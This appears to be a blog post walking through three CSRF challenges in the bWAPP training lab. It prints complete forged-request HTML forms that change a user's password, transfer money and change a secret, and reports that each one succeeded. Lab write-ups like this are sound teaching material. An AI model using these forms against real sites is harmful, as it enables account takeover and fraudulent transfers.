CSRF (Change Password)
The first challenge is the change password CSRF. Our goal is to successfully change the users password with out logging on the system.
<html> <body> <form action="http://192.168.56.101/bWAPP/csrf_1.php"> <input type="hidden" name="password_new" value="abc" /> <input type="hidden" name="password_conf" value="abc" /> <input type="hidden" name="action" value="change" /> <input type="submit" value="Submit Request" /> </form> </body> </html>
First we need to create a special page with all the variables needed filled in and a submit button to submit the request. All thats left to do is click the submit button and check the page status.
As you can see we successfully changed our password with the page we created and the CSRF vulnerability.
CSRF (Transfer Amount)
Next up is the transfer amount csrf. This page sends money to an account number with a total value to send. If we alter the variables in the request and push our own request to the server we should get the results we are looking for.
<html> <body> <form action="http://192.168.56.101/bWAPP/csrf_2.php" method="GET"> <input type="hidden" name="account" value="123-45678-90" /> <input type="hidden" name="amount" value="100" /> <input type="hidden" name="action" value="transfer" /> <input type="submit" name="submit" value="Submit Request" /> </form> </body> </html>
We got the page all set up. Now all thats left to do is submit the request and hope for the best.
As you can see we submitted the request and there is now 800 euros left in the account instead of 900 like before the CSRF vulnerability.
CSRF (Change Secret)
This one is a change secret CSRF. Like before we construct a page with all our variables and a submit button
<html> <body> <form action="http://192.168.56.101/bWAPP/csrf_3.php" method="POST"> <input type="hidden" name="secret" value="1234" /> <input type="hidden" name="login" value="xyz" /> <input type="hidden" name="action" value="change" /> <input type="submit" value="Submit Request" /> </form> </body> </html>
We have got our page set up. Lets submit the request and see what we get on the other end
As you can see we successfully changed the secret of the user.
No comments:
Post a Comment